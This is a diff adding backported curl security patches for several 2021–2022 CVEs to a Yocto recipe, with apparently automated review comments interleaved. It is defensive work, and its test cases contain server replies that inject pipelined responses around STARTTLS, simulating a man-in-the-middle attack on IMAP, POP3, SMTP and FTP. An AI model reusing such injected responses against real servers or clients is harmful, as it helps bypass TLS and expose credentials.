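++ /* We don't have a SSL/TLS control connection yet, but FTPS is
+ requested. Try a FTPS connection now */
+
+ ftpc->count3 = 0;
+@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(!result) {
+ conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */
++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */
+ result = ftp_state_user(conn);
+ }
+ }
+@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn)
+ *
+ */
+ static CURLcode ftp_connect(struct connectdata *conn,
+- bool *done) /* see description above */
++ bool *done) /* see description above */
+ {
+ CURLcode result;
+ struct ftp_conn *ftpc = &conn->proto.ftpc;
+@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn,
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(result)
+ return result;
++ conn->bits.ftp_use_control_ssl = TRUE;
+ }
+
+ Curl_pp_init(pp); /* init the generic pingpong data */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ff2d686..d1fb4a9 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -461,6 +461,7 @@ struct ConnectBits {
+ EPRT doesn't work we disable it for the forthcoming
+ requests */
+ BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */
++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */
+ #endif
+ BIT(netrc); /* name+password provided by netrc */
+ BIT(userpwd_in_url); /* name+password found in url */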
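Review bot: The comment on the new `ftp_use_control_ssl` bit in lib/urldata.h does not say how it differs from `conn->ssl[FIRSTSOCKET].use`. That difference is what the commit message is about: TLS towards an HTTPS proxy versus TLS on the FTP control channel. I would word it as `/* TLS negotiated on the FTP control connection itself, not merely to an HTTPS proxy */` so that later checks do not drift back to the socket-level flag. In the hunks shown the bit is only set to TRUE, after `Curl_ssl_connect()` returns success; the enclosing functions and the struct continue outside the hunks.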
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
new file mode 100644
index 0000000000..98032d8b78
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
@@ -0,0 +1,328 @@
1Backport of:
2
3From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001
4From: Patrick Monnerat <patrick@monnerat.net>
5Date: Wed, 8 Sep 2021 11:56:22 +0200
6Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd
7
8In imap and pop3, check if TLS is required even when capabilities
9request has failed.
10
11In ftp, ignore preauthentication (230 status of server greeting) if TLS
12is required.
13
14Bug: https://curl.se/docs/CVE-2021-22946.html
15Upstream-Status: backport from 7.68.0-1ubuntu2.7
16Signed-off-by: Mike Crowe <mac@mcrowe.com>
17CVE: CVE-2021-22946
18---
19 lib/ftp.c | 9 ++++---
20 lib/imap.c | 24 ++++++++----------
21 lib/pop3.c | 33 +++++++++++-------------
22 tests/data/Makefile.inc | 2 ++
23 tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++
24 tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++
25 tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++
26 7 files changed, 195 insertions(+), 36 deletions(-)
27 create mode 100644 tests/data/test984
28 create mode 100644 tests/data/test985
29 create mode 100644 tests/data/test986
30
31diff --git a/lib/ftp.c b/lib/ftp.c
32index 677527f..91b43d8 100644
33--- a/lib/ftp.c
34+++ b/lib/ftp.c
35@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
36 /* we have now received a full FTP server response */
37 switch(ftpc->state) {
38 case FTP_WAIT220:
39- if(ftpcode == 230)
40- /* 230 User logged in - already! */
41- return ftp_state_user_resp(conn, ftpcode, ftpc->state);
42+ if(ftpcode == 230) {
43+ /* 230 User logged in - already! Take as 220 if TLS required. */
44+ if(data->set.use_ssl <= CURLUSESSL_TRY ||
45+ conn->bits.ftp_use_control_ssl)
46+ return ftp_state_user_resp(conn, ftpcode, ftpc->state);
47+ }
48 else if(ftpcode != 220) {
49 failf(data, "Got a %03d ftp-server response when 220 was expected",
50 ftpcode);
51diff --git a/lib/imap.c b/lib/imap.c
52index 66172bd..9880ce1 100644
53--- a/lib/imap.c
54+++ b/lib/imap.c
55@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn,
56 line += wordlen;
57 }
58 }
59- else if(imapcode == IMAP_RESP_OK) {
60- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
61- /* We don't have a SSL/TLS connection yet, but SSL is requested */
62- if(imapc->tls_supported)
63- /* Switch to TLS connection now */
64- result = imap_perform_starttls(conn);
65- else if(data->set.use_ssl == CURLUSESSL_TRY)
66- /* Fallback and carry on with authentication */
67- result = imap_perform_authentication(conn);
68- else {
69- failf(data, "STARTTLS not supported.");
70- result = CURLE_USE_SSL_FAILED;
71- }
72+ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
73+ /* PREAUTH is not compatible with STARTTLS. */
74+ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) {
75+ /* Switch to TLS connection now */
76+ result = imap_perform_starttls(conn);
77 }
78- else
79+ else if(data->set.use_ssl <= CURLUSESSL_TRY)
80 result = imap_perform_authentication(conn);
81+ else {
82+ failf(data, "STARTTLS not available.");
83+ result = CURLE_USE_SSL_FAILED;
84+ }
85 }
86 else
87 result = imap_perform_authentication(conn);
88diff --git a/lib/pop3.c b/lib/pop3.c
89index 57c1373..145b2b4 100644
90--- a/lib/pop3.c
91+++ b/lib/pop3.c
92@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code,
93 }
94 }
95 }
96- else if(pop3code == '+') {
97- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
98- /* We don't have a SSL/TLS connection yet, but SSL is requested */
99- if(pop3c->tls_supported)
100- /* Switch to TLS connection now */
101- result = pop3_perform_starttls(conn);
102- else if(data->set.use_ssl == CURLUSESSL_TRY)
103- /* Fallback and carry on with authentication */
104- result = pop3_perform_authentication(conn);
105- else {
106- failf(data, "STLS not supported.");
107- result = CURLE_USE_SSL_FAILED;
108- }
109- }
110- else
111- result = pop3_perform_authentication(conn);
112- }
113 else {
114 /* Clear text is supported when CAPA isn't recognised */
115- pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
116+ if(pop3code != '+')
117+ pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
118
119- result = pop3_perform_authentication(conn);
120+ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use)
121+ result = pop3_perform_authentication(conn);
122+ else if(pop3code == '+' && pop3c->tls_supported)
123+ /* Switch to TLS connection now */
124+ result = pop3_perform_starttls(conn);
125+ else if(data->set.use_ssl <= CURLUSESSL_TRY)
126+ /* Fallback and carry on with authentication */
127+ result = pop3_perform_authentication(conn);
128+ else {
129+ failf(data, "STLS not supported.");
130+ result = CURLE_USE_SSL_FAILED;
131+ }
132 }
133
134 return result;
135diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
136index f9535a6..0fa6799 100644
137--- a/tests/data/Makefile.inc
138+++ b/tests/data/Makefile.inc
139@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
140 test954 test955 test956 test957 test958 test959 test960 test961 test962 \
141 test963 test964 test965 test966 test967 test968 test969 \
142 \
143+test984 test985 test986 \
144+\
145 test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
146 test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \
147 test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \
148diff --git a/tests/data/test984 b/tests/data/test984
149new file mode 100644
150index 0000000..e573f23
151--- /dev/null
152+++ b/tests/data/test984
153@@ -0,0 +1,56 @@
154+<testcase>
155+<info>
156+<keywords>
157+IMAP
158+STARTTLS
159+</keywords>
160+</info>
161+
162+#
163+# Server-side
164+<reply>
165+<servercmd>
166+REPLY CAPABILITY A001 BAD Not implemented
167+</servercmd>
168+</reply>
169+
170+#
171+# Client-side
172+<client>
173+<features>
174+SSL
175+</features>
176+<server>
177+imap
178+</server>
179+ <name>
180+IMAP require STARTTLS with failing capabilities
181+ </name>
182+ <command>
183+imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd
184+</command>
185+<file name="log/upload%TESTNUMBER">
186+Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
187+From: Fred Foobar <foobar@example.COM>
188+Subject: afternoon meeting
189+To: joe@example.com
190+Message-Id: <B27397-0100000@example.COM>
191+MIME-Version: 1.0
192+Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
193+
194+Hello Joe, do you think we can meet at 3:30 tomorrow?
195+</file>
196+</client>
197+
198+#
199+# Verify data after the test has been "shot"
200+<verify>
201+# 64 is CURLE_USE_SSL_FAILED
202+<errorcode>
203+64
204+</errorcode>
205+<protocol>
206+A001 CAPABILITY
207+</protocol>
208+</verify>
209+</testcase>
210diff --git a/tests/data/test985 b/tests/data/test985
211new file mode 100644
212index 0000000..d0db4aa
213--- /dev/null
214+++ b/tests/data/test985
215@@ -0,0 +1,54 @@
216+<testcase>
217+<info>
218+<keywords>
219+POP3
220+STARTTLS
221+</keywords>
222+</info>
223+
224+#
225+# Server-side
226+<reply>
227+<servercmd>
228+REPLY CAPA -ERR Not implemented
229+</servercmd>
230+<data nocheck="yes">
231+From: me@somewhere
232+To: fake@nowhere
233+
234+body
235+
236+--
237+ yours sincerely
238+</data>
239+</reply>
240+
241+#
242+# Client-side
243+<client>
244+<features>
245+SSL
246+</features>
247+<server>
248+pop3
249+</server>
250+ <name>
251+POP3 require STARTTLS with failing capabilities
252+ </name>
253+ <command>
254+pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd
255+ </command>
256+</client>
257+
258+#
259+# Verify data after the test has been "shot"
260+<verify>
261+# 64 is CURLE_USE_SSL_FAILED
262+<errorcode>
263+64
264+</errorcode>
265+<protocol>
266+CAPA
267+</protocol>
268+</verify>
269+</testcase>
270diff --git a/tests/data/test986 b/tests/data/test986
271new file mode 100644
272index 0000000..a709437
273--- /dev/null
274+++ b/tests/data/test986
275@@ -0,0 +1,53 @@
276+<testcase>
277+<info>
278+<keywords>
279+FTP
280+STARTTLS
281+</keywords>
282+</info>
283+
284+#
285+# Server-side
286+<reply>
287+<servercmd>
288+REPLY welcome 230 Welcome
289+REPLY AUTH 500 unknown command
290+</servercmd>
291+</reply>
292+
293+# Client-side
294+<client>
295+<features>
296+SSL
297+</features>
298+<server>
299+ftp
300+</server>
301+ <name>
302+FTP require STARTTLS while preauthenticated
303+ </name>
304+<file name="log/test%TESTNUMBER.txt">
305+data
306+ to
307+ see
308+that FTPS
309+works
310+ so does it?
311+</file>
312+ <command>
313+--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret
314+</command>
315+</client>
316+
317+# Verify data after the test has been "shot"
318+<verify>
319+# 64 is CURLE_USE_SSL_FAILED
320+<errorcode>
321+64
322+</errorcode>
323+<protocol>
324+AUTH SSL
325+AUTH TLS
326+</protocol>
327+</verify>
328+</testcase>
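Review bot: The `!imapc->preauth` condition added in the lib/imap.c hunk is not exercised by any of the three new tests. test984 only covers a failing CAPABILITY reply, test985 covers POP3 and test986 the FTP 230 greeting. A further IMAP case would pin the branch that now ends in `failf(data, "STARTTLS not available.")`: the server greets with PREAUTH and the client is run with `--ssl-reqd`. From the branch order shown it should end with error 64 (CURLE_USE_SSL_FAILED). The functions touched start and end outside the hunks, so how the PREAUTH greeting reaches `imap_state_capability_resp()` should be confirmed against the full file.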
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
new file mode 100644
index 0000000000..070a328e27
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
@@ -0,0 +1,352 @@
1Backport of:
2
3From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001
4From: Patrick Monnerat <patrick@monnerat.net>
5Date: Tue, 7 Sep 2021 13:26:42 +0200
6Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response
7 pipelining
8
9If a server pipelines future responses within the STARTTLS response, the
10former are preserved in the pingpong cache across TLS negotiation and
11used as responses to the encrypted commands.
12
13This fix detects pipelined STARTTLS responses and rejects them with an
14error.
15
16Bug: https://curl.se/docs/CVE-2021-22947.html
17Upstream-Status: backport from 7.68.0-1ubuntu2.7
18Signed-off-by: Mike Crowe <mac@mcrowe.com>
19CVE: CVE-2021-22947
20
21---
22 lib/ftp.c | 3 +++
23 lib/imap.c | 4 +++
24 lib/pop3.c | 4 +++
25 lib/smtp.c | 4 +++
26 tests/data/Makefile.inc | 2 ++
27 tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++
28 tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++
29 tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++
30 tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++
31 9 files changed, 237 insertions(+)
32 create mode 100644 tests/data/test980
33 create mode 100644 tests/data/test981
34 create mode 100644 tests/data/test982
35 create mode 100644 tests/data/test983
36
37diff --git a/lib/ftp.c b/lib/ftp.c
38index 91b43d8..31a34e8 100644
39--- a/lib/ftp.c
40+++ b/lib/ftp.c
41@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
42 case FTP_AUTH:
43 /* we have gotten the response to a previous AUTH command */
44
45+ if(pp->cache_size)
46+ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */
47+
48 /* RFC2228 (page 5) says:
49 *
50 * If the server is willing to accept the named security mechanism,
51diff --git a/lib/imap.c b/lib/imap.c
52index 9880ce1..0ca700f 100644
53--- a/lib/imap.c
54+++ b/lib/imap.c
55@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn,
56
57 (void)instate; /* no use for this yet */
58
59+ /* Pipelining in response is forbidden. */
60+ if(data->conn->proto.imapc.pp.cache_size)
61+ return CURLE_WEIRD_SERVER_REPLY;
62+
63 if(imapcode != IMAP_RESP_OK) {
64 if(data->set.use_ssl != CURLUSESSL_TRY) {
65 failf(data, "STARTTLS denied");
66diff --git a/lib/pop3.c b/lib/pop3.c
67index 145b2b4..8a2d52e 100644
68--- a/lib/pop3.c
69+++ b/lib/pop3.c
70@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn,
71
72 (void)instate; /* no use for this yet */
73
74+ /* Pipelining in response is forbidden. */
75+ if(data->conn->proto.pop3c.pp.cache_size)
76+ return CURLE_WEIRD_SERVER_REPLY;
77+
78 if(pop3code != '+') {
79 if(data->set.use_ssl != CURLUSESSL_TRY) {
80 failf(data, "STARTTLS denied");
81diff --git a/lib/smtp.c b/lib/smtp.c
82index e187287..66183e2 100644
83--- a/lib/smtp.c
84+++ b/lib/smtp.c
85@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn,
86
87 (void)instate; /* no use for this yet */
88
89+ /* Pipelining in response is forbidden. */
90+ if(data->conn->proto.smtpc.pp.cache_size)
91+ return CURLE_WEIRD_SERVER_REPLY;
92+
93 if(smtpcode != 220) {
94 if(data->set.use_ssl != CURLUSESSL_TRY) {
95 failf(data, "STARTTLS denied, code %d", smtpcode);
96diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
97index 0fa6799..60e8176 100644
98--- a/tests/data/Makefile.inc
99+++ b/tests/data/Makefile.inc
100@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
101 test954 test955 test956 test957 test958 test959 test960 test961 test962 \
102 test963 test964 test965 test966 test967 test968 test969 \
103 \
104+test980 test981 test982 test983 \
105+\
106 test984 test985 test986 \
107 \
108 test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
109diff --git a/tests/data/test980 b/tests/data/test980
110new file mode 100644
111index 0000000..97567f8
112--- /dev/null
113+++ b/tests/data/test980
114@@ -0,0 +1,52 @@
115+<testcase>
116+<info>
117+<keywords>
118+SMTP
119+STARTTLS
120+</keywords>
121+</info>
122+
123+#
124+# Server-side
125+<reply>
126+<servercmd>
127+CAPA STARTTLS
128+AUTH PLAIN
129+REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted
130+REPLY AUTH 535 5.7.8 Authentication credentials invalid
131+</servercmd>
132+</reply>
133+
134+#
135+# Client-side
136+<client>
137+<features>
138+SSL
139+</features>
140+<server>
141+smtp
142+</server>
143+ <name>
144+SMTP STARTTLS pipelined server response
145+ </name>
146+<stdin>
147+mail body
148+</stdin>
149+ <command>
150+smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T -
151+</command>
152+</client>
153+
154+#
155+# Verify data after the test has been "shot"
156+<verify>
157+# 8 is CURLE_WEIRD_SERVER_REPLY
158+<errorcode>
159+8
160+</errorcode>
161+<protocol>
162+EHLO %TESTNUMBER
163+STARTTLS
164+</protocol>
165+</verify>
166+</testcase>
167diff --git a/tests/data/test981 b/tests/data/test981
168new file mode 100644
169index 0000000..2b98ce4
170--- /dev/null
171+++ b/tests/data/test981
172@@ -0,0 +1,59 @@
173+<testcase>
174+<info>
175+<keywords>
176+IMAP
177+STARTTLS
178+</keywords>
179+</info>
180+
181+#
182+# Server-side
183+<reply>
184+<servercmd>
185+CAPA STARTTLS
186+REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted
187+REPLY LOGIN A003 BAD Authentication credentials invalid
188+</servercmd>
189+</reply>
190+
191+#
192+# Client-side
193+<client>
194+<features>
195+SSL
196+</features>
197+<server>
198+imap
199+</server>
200+ <name>
201+IMAP STARTTLS pipelined server response
202+ </name>
203+ <command>
204+imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl
205+</command>
206+<file name="log/upload%TESTNUMBER">
207+Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
208+From: Fred Foobar <foobar@example.COM>
209+Subject: afternoon meeting
210+To: joe@example.com
211+Message-Id: <B27397-0100000@example.COM>
212+MIME-Version: 1.0
213+Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
214+
215+Hello Joe, do you think we can meet at 3:30 tomorrow?
216+</file>
217+</client>
218+
219+#
220+# Verify data after the test has been "shot"
221+<verify>
222+# 8 is CURLE_WEIRD_SERVER_REPLY
223+<errorcode>
224+8
225+</errorcode>
226+<protocol>
227+A001 CAPABILITY
228+A002 STARTTLS
229+</protocol>
230+</verify>
231+</testcase>
232diff --git a/tests/data/test982 b/tests/data/test982
233new file mode 100644
234index 0000000..9e07cc0
235--- /dev/null
236+++ b/tests/data/test982
237@@ -0,0 +1,57 @@
238+<testcase>
239+<info>
240+<keywords>
241+POP3
242+STARTTLS
243+</keywords>
244+</info>
245+
246+#
247+# Server-side
248+<reply>
249+<servercmd>
250+CAPA STLS USER
251+REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated
252+REPLY PASS -ERR Authentication credentials invalid
253+</servercmd>
254+<data nocheck="yes">
255+From: me@somewhere
256+To: fake@nowhere
257+
258+body
259+
260+--
261+ yours sincerely
262+</data>
263+</reply>
264+
265+#
266+# Client-side
267+<client>
268+<features>
269+SSL
270+</features>
271+<server>
272+pop3
273+</server>
274+ <name>
275+POP3 STARTTLS pipelined server response
276+ </name>
277+ <command>
278+pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl
279+ </command>
280+</client>
281+
282+#
283+# Verify data after the test has been "shot"
284+<verify>
285+# 8 is CURLE_WEIRD_SERVER_REPLY
286+<errorcode>
287+8
288+</errorcode>
289+<protocol>
290+CAPA
291+STLS
292+</protocol>
293+</verify>
294+</testcase>
295diff --git a/tests/data/test983 b/tests/data/test983
296new file mode 100644
297index 0000000..300ec45
298--- /dev/null
299+++ b/tests/data/test983
300@@ -0,0 +1,52 @@
301+<testcase>
302+<info>
303+<keywords>
304+FTP
305+STARTTLS
306+</keywords>
307+</info>
308+
309+#
310+# Server-side
311+<reply>
312+<servercmd>
313+REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete
314+REPLY PASS 530 Login incorrect
315+</servercmd>
316+</reply>
317+
318+# Client-side
319+<client>
320+<features>
321+SSL
322+</features>
323+<server>
324+ftp
325+</server>
326+ <name>
327+FTP STARTTLS pipelined server response
328+ </name>
329+<file name="log/test%TESTNUMBER.txt">
330+data
331+ to
332+ see
333+that FTPS
334+works
335+ so does it?
336+</file>
337+ <command>
338+--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP
339+</command>
340+</client>
341+
342+# Verify data after the test has been "shot"
343+<verify>
344+# 8 is CURLE_WEIRD_SERVER_REPLY
345+<errorcode>
346+8
347+</errorcode>
348+<protocol>
349+AUTH SSL
350+</protocol>
351+</verify>
352+</testcase>
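Review bot: The new `cache_size` checks return CURLE_WEIRD_SERVER_REPLY without a `failf()`, so a rejected pipelined STARTTLS response leaves only a generic error code behind. This applies to the lib/ftp.c, lib/imap.c, lib/pop3.c and lib/smtp.c hunks alike. The neighbouring branches in the same functions explain themselves (`failf(data, "STARTTLS denied")`), and someone reading client logs cannot tell this rejection apart from any other malformed reply. I would add a message before each return, for example `failf(data, "STARTTLS response contains pipelined data");`, if diverging from the backported text is acceptable. The four functions continue outside the hunks.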
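--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-22576.patch
@@ -0,0 +1,148 @@
+From 852aa5ad351ea53e5f01d2f44b5b4370c2bf5425 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 25 Apr 2022 11:44:05 +0200
+Subject: [PATCH] url: check sasl additional parameters for connection reuse.
+
+Also move static function safecmp() as non-static Curl_safecmp() since
+its purpose is needed at several places.
+
+Bug: https://curl.se/docs/CVE-2022-22576.html
+
+CVE-2022-22576
+
+Closes #8746
+---
+ lib/strcase.c | 10 ++++++++++
+ lib/strcase.h | 2 ++
+ lib/url.c | 13 ++++++++++++-
+ lib/urldata.h | 1 +
+ lib/vtls/vtls.c | 21 ++++++---------------
+ 5 files changed, 31 insertions(+), 16 deletions(-)
+
+CVE: CVE-2022-22576
+Upstream-Status: Backport [https://github.com/curl/curl/commit/852aa5ad351ea53e5f01d2f44b5b4370c2bf5425.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/strcase.c b/lib/strcase.c
+index dd46ca1ba0e5..692a3f14aee7 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -251,6 +251,16 @@
+ } while(*src++ && --n);
+ }
+
++/* Compare case-sensitive NUL-terminated strings, taking care of possible
++ * null pointers. Return true if arguments match.
++ */
++bool Curl_safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ return !a && !b;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index b234d3815220..2635f5117e99 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -48,4 +48,6 @@
+ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
++bool Curl_safecmp(char *a, char *b);
++
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9a988b4d58d8..e1647b133854 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -730,6 +730,7 @@
+ Curl_safefree(conn->allocptr.host);
+ Curl_safefree(conn->allocptr.cookiehost);
+ Curl_safefree(conn->allocptr.rtsp_transport);
++ Curl_safefree(conn->oauth_bearer);
+ Curl_safefree(conn->trailer);
+ Curl_safefree(conn->host.rawalloc); /* host name buffer */
+ Curl_safefree(conn->conn_to_host.rawalloc); /* host name buffer */
+@@ -1251,7 +1252,9 @@
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+ if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ strcmp(needle->passwd, check->passwd) ||
++ !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
++ !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -3392,6 +3395,14 @@
+ result = CURLE_OUT_OF_MEMORY;
+ goto out;
+ }
++ }
++
++ if(data->set.str[STRING_BEARER]) {
++ conn->oauth_bearer = strdup(data->set.str[STRING_BEARER]);
++ if(!conn->oauth_bearer) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto out;
++ }
+ }
+
+ #ifdef USE_UNIX_SOCKETS
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 07eb19b87034..1d89b8d7fa68 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -949,6 +949,8 @@
+
+ char *sasl_authzid; /* authorisation identity string, allocated */
+
++ char *oauth_bearer; /* OAUTH2 bearer, allocated */
++
+ int httpversion; /* the HTTP version*10 reported by the server */
+ int rtspversion; /* the RTSP version*10 reported by the server */
+
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index 03b85ba065e5..a40ac06f684f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,15 +82,6 @@
+ else \
+ dest->var = NULL;
+
+-static bool safecmp(char *a, char *b)
+-{
+- if(a && b)
+- return !strcmp(a, b);
+- else if(!a && !b)
+- return TRUE; /* match */
+- return FALSE; /* no match */
+-}
+-
+
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+@@ -101,12 +101,12 @@
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- safecmp(data->CApath, needle->CApath) &&
+- safecmp(data->CAfile, needle->CAfile) &&
+- safecmp(data->issuercert, needle->issuercert) &&
+- safecmp(data->clientcert, needle->clientcert) &&
+- safecmp(data->random_file, needle->random_file) &&
+- safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->CApath, needle->CApath) &&
++ Curl_safecmp(data->CAfile, needle->CAfile) &&
++ Curl_safecmp(data->issuercert, needle->issuercert) &&
++ Curl_safecmp(data->clientcert, needle->clientcert) &&
++ Curl_safecmp(data->random_file, needle->random_file) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))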
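Review bot: The comment above the connection-reuse check in the second lib/url.c hunk still says "verify that we're using the same name and password as well", but the condition now also compares `sasl_authzid` and `oauth_bearer`. Because this check decides whether an authenticated connection may be reused, the comment should list everything that must match: `/* This protocol requires credentials per connection, so verify that user, password, SASL authzid and OAuth bearer all match */`. The enclosing function starts and ends outside the hunk.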
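--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-1.patch
@@ -0,0 +1,45 @@
+From 2a797e099731facf62a2c675396334bc2ad3bc7c Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] connect: store "conn_remote_port" in the info struct
+
+To make it available after the connection ended.
+
+Prerequisite for the patches that address CVE-2022-27774.
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/08b8ef4e726ba10f45081ecda5b3cea788d3c839]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/connect.c | 1 +
+ lib/urldata.h | 6 +++++-
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index b3d4057..a977d67 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -624,6 +624,7 @@ void Curl_persistconninfo(struct connectdata *conn)
+ conn->data->info.conn_scheme = conn->handler->scheme;
+ conn->data->info.conn_protocol = conn->handler->protocol;
+ conn->data->info.conn_primary_port = conn->primary_port;
++ conn->data->info.conn_remote_port = conn->remote_port;
+ conn->data->info.conn_local_port = conn->local_port;
+ }
+
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fafb7a3..ab1b267 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1148,7 +1148,11 @@ struct PureInfo {
+ reused, in the connection cache. */
+
+ char conn_primary_ip[MAX_IPADR_LEN];
+- long conn_primary_port;
++ long conn_primary_port; /* this is the destination port to the connection,
++ which might have been a proxy */
++ long conn_remote_port; /* this is the "remote port", which is the port
++ number of the used URL, independent of proxy or
++ not */
+ char conn_local_ip[MAX_IPADR_LEN];
+ long conn_local_port;
+ const char *conn_scheme;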
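--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-2.patch
@@ -0,0 +1,80 @@
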